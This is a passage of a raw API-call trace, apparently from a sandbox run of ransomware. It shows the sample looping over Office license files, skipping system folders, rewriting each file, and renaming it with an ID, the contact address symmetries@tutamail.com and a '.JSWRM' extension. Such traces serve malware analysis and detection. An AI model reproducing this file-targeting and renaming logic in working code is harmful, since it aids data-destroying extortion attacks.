lpWideCharStr="VisioProVL_MAK-ppd.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2413d0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0111.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0111.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0111.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.841] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0111.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.842] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6805) returned 1 [0111.842] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.842] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a90) returned 0x205850 [0111.842] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a90, lpOverlapped=0x0) returned 1 [0111.844] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.844] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a90, lpOverlapped=0x0) returned 1 [0111.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0111.844] CloseHandle (hObject=0x45c) returned 1 [0111.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0111.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.844] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0111.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0111.845] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0111.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0111.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0111.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0111.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0111.845] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0111.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0111.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0111.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0111.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0111.846] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec72a8ac, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec72a8ac, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec79cf9c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d47, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_MAK-ul-oob.xrm-ms", cAlternateFileName="VIEFE2~1.XRM")) returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned 1 [0111.846] lstrcmpiW (lpString1="VisioProVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0111.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.846] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.846] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0111.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0111.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-oob.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0111.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0111.847] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0111.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0111.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.847] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11591) returned 1 [0111.847] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.847] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0111.847] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0111.852] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.852] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0111.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.852] CloseHandle (hObject=0x45c) returned 1 [0111.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0111.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0111.852] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.852] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0111.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0111.853] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0111.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0111.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0111.853] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.853] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.854] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec6b8199, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec6b8199, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec776d44, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioProVL_MAK-ul-phn.xrm-ms", cAlternateFileName="VI42CE~1.XRM")) returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2=".") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="..") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="...") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="windows") returned -1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="recovery") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="system volume information") returned 1 [0111.854] lstrcmpiW (lpString1="VisioProVL_MAK-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0111.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0111.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0111.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241330, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0111.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d728 [0111.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0111.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0111.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioProVL_MAK-ul-phn.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241268, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VisioProVL_MAK-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d728 | out: hHeap=0x1e0000) returned 1 [0111.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0111.854] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0111.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0111.854] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0111.854] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0111.854] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0111.855] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19936) returned 1 [0111.855] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.855] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0111.855] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0111.860] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.860] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0111.860] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0111.861] CloseHandle (hObject=0x45c) returned 1 [0111.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0111.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0111.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0111.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0111.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0111.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0111.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0111.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0111.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0111.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0111.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0111.861] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0111.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0111.861] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0111.861] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\VisioProVL_MAK-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\visioprovl_mak-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0111.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0111.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0111.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0111.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0111.862] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0111.862] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xec8a8030, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xec8a8030, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xec940998, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bbf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="VisioStdCO365R_Subscription-pl.xrm-ms", cAlternateFileName="VI7D35~1.XRM")) returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned 1 [0111.862] lstrcmpiW (lpString1="VisioStdCO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0111.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0111.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0111.862] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0111.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VisioStdCO365R_Subscription-pl.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d0a0, cbMultiByte=37, lpDefaultChar=0x0, 